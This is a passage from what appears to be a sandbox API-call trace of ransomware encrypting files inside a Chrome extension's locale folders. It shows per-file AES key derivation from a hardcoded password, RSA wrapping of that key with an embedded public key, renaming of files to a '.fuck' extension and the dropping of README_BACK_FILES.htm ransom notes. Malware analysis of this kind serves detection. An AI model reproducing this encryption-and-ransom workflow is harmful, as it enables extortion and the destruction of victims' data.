lpOverlapped=0x0) returned 1 [0247.715] CloseHandle (hObject=0x5d58) returned 1 [0247.715] CloseHandle (hObject=0x5d5c) returned 1 [0247.717] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), bFailIfExists=0) returned 1 [0247.721] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", dwFileAttributes=0x0) returned 1 [0247.721] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.gsg")) returned 1 [0247.722] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.fuck")) returned 1 [0247.723] CryptDestroyHash (hHash=0x29387f8) returned 1 [0247.724] CryptDestroyKey (hKey=0x2938ab8) returned 1 [0247.724] CryptReleaseContext (hProv=0x293a510, dwFlags=0x0) returned 1 [0247.724] FindNextFileA (in: hFindFile=0x29385f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0247.724] FindClose (in: hFindFile=0x29385f8 | out: hFindFile=0x29385f8) returned 1 [0247.724] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\readme_back_files.htm")) returned 0xffffffff [0247.724] AreFileApisANSI () returned 1 [0247.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0247.724] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.725] GetFileType (hFile=0x5d50) returned 0x1 [0247.725] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0247.726] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.727] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0247.727] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.727] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.727] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.727] GetLastError () returned 0x0 [0247.727] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json")) returned 0x20 [0247.727] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", dwFileAttributes=0x80) returned 1 [0247.728] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.728] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.730] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0247.730] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293a510) returned 1 [0247.733] CryptCreateHash (in: hProv=0x293a510, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0247.733] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0247.733] CryptHashData (hHash=0x29385f8, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.733] CryptDeriveKey (in: hProv=0x293a510, Algid=0x6610, hBaseData=0x29385f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938678) returned 1 [0247.733] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.733] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0247.733] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293a730) returned 1 [0247.734] CryptImportPublicKeyInfo (in: hCryptProv=0x293a730, dwCertEncodingType=0x1, pInfo=0x2930160*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930190*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930198*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2938938) returned 1 [0247.734] CryptEncrypt (in: hKey=0x2938938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0247.734] CryptEncrypt (in: hKey=0x2938938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293a840*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293a840*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0247.734] WriteFile (in: hFile=0x5d58, lpBuffer=0x293a840*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293a840*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0247.736] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0247.737] CryptEncrypt (in: hKey=0x2938678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0247.737] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0247.737] CloseHandle (hObject=0x5d5c) returned 1 [0247.737] CloseHandle (hObject=0x5d58) returned 1 [0247.738] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), bFailIfExists=0) returned 1 [0247.744] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", dwFileAttributes=0x0) returned 1 [0247.744] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.gsg")) returned 1 [0247.746] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.fuck")) returned 1 [0247.748] CryptDestroyHash (hHash=0x29385f8) returned 1 [0247.748] CryptDestroyKey (hKey=0x2938678) returned 1 [0247.748] CryptReleaseContext (hProv=0x293a510, dwFlags=0x0) returned 1 [0247.748] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0247.749] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0247.749] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\readme_back_files.htm")) returned 0xffffffff [0247.749] AreFileApisANSI () returned 1 [0247.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0247.749] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.750] GetFileType (hFile=0x5d50) returned 0x1 [0247.750] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0247.751] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.751] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938ab8 [0247.752] FindNextFileA (in: hFindFile=0x2938ab8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.752] FindNextFileA (in: hFindFile=0x2938ab8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.753] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.753] GetLastError () returned 0x0 [0247.753] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json")) returned 0x20 [0247.753] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", dwFileAttributes=0x80) returned 1 [0247.754] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.754] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.755] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0247.755] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293ac80) returned 1 [0247.759] CryptCreateHash (in: hProv=0x293ac80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0247.759] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0247.759] CryptHashData (hHash=0x2938af8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.759] CryptDeriveKey (in: hProv=0x293ac80, Algid=0x6610, hBaseData=0x2938af8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938978) returned 1 [0247.759] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.759] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0247.760] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293a8c8) returned 1 [0247.760] CryptImportPublicKeyInfo (in: hCryptProv=0x293a8c8, dwCertEncodingType=0x1, pInfo=0x292ef80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292efb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292efb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2938678) returned 1 [0247.760] CryptEncrypt (in: hKey=0x2938678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0247.760] CryptEncrypt (in: hKey=0x2938678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293a950*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293a950*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0247.761] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293a950*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293a950*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0247.762] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0247.764] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0247.764] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0247.765] CloseHandle (hObject=0x5d58) returned 1 [0247.765] CloseHandle (hObject=0x5d5c) returned 1 [0247.766] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), bFailIfExists=0) returned 1 [0247.770] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", dwFileAttributes=0x0) returned 1 [0247.771] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.gsg")) returned 1 [0247.773] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.fuck")) returned 1 [0247.775] CryptDestroyHash (hHash=0x2938af8) returned 1 [0247.775] CryptDestroyKey (hKey=0x2938978) returned 1 [0247.775] CryptReleaseContext (hProv=0x293ac80, dwFlags=0x0) returned 1 [0247.775] FindNextFileA (in: hFindFile=0x2938ab8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0247.775] FindClose (in: hFindFile=0x2938ab8 | out: hFindFile=0x2938ab8) returned 1 [0247.775] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\readme_back_files.htm")) returned 0xffffffff [0247.776] AreFileApisANSI () returned 1 [0247.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0247.776] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.776] GetFileType 